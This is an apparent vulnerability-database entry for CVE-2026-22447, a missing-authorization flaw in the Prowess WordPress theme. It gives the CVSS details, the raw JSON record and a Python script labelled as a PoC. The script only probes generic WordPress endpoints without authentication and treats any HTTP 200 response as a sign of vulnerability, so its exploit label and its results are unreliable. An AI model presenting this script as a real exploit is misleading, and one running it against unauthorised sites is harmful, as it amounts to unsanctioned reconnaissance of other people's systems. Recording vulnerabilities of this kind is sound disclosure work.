Security Vulnerability Report
中文
CVE-2026-22447 CVSS 5.3 MEDIUM

CVE-2026-22447

Published: 2026-01-22 17:16:35
Last Modified: 2026-04-28 19:36:38

Description

Missing Authorization vulnerability in Select-Themes Prowess prowess allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Prowess: from n/a through <= 1.8.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Prowess Theme <= 1.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22447 PoC - Prowess Theme Broken Access Control # Affected: Prowess Theme <= 1.8.1 import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # List of potentially vulnerable endpoints (example paths) endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/users', '/wp-content/themes/prowess/includes/', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', } print(f'[*] Testing CVE-2026-22447 on {target}') print(f'[*] Target: Prowess Theme <= 1.8.1 - Missing Authorization') for endpoint in endpoints: url = target + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) print(f'[+] Endpoint: {endpoint} - Status: {response.status_code}') if response.status_code == 200: print(f' [!] Potentially vulnerable - Unauthorized access possible') except requests.exceptions.RequestException as e: print(f'[-] Error testing {endpoint}: {e}') print('[*] Note: Specific PoC requires enumeration of vulnerable functions in the theme.') print('[*] Recommended: Check theme source code for missing permission_callback or current_user checks.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22447", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:34.537", "lastModified": "2026-04-28T19:36:38.003", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Select-Themes Prowess prowess allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Prowess: from n/a through <= 1.8.1."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Select-Themes Prowess prowess permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Prowess: desde n/a hasta &lt;= 1.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/prowess/vulnerability/wordpress-prowess-theme-1-8-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}